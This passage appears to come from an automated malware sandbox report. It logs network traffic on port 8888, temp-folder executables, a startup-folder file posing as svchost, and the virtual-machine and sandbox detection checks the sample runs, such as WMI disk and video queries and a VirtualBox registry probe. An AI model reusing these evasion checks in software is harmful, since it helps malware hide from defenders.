Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49998

Source: C:\Users\user\AppData\Local\Temp\9675.exe

Code function: 21_2_0040DA6D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

21_2_0040DA6D

Source: C:\Users\user\AppData\Local\Temp\9675.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9163.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9163.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9163.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9C52.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9C52.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Checks if the current machine is a virtual machine (disk enumeration)

Show sources

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ehdjcua	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ehdjcua	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ehdjcua	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ehdjcua	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ehdjcua	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ehdjcua	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AD1D.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AD1D.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AD1D.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AD1D.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: IuXJUPoEo6.exe, 00000004.00000002.247995747.0000000001FC0000.00000004.00000001.sdmp

Binary or memory string: ASWHOOK

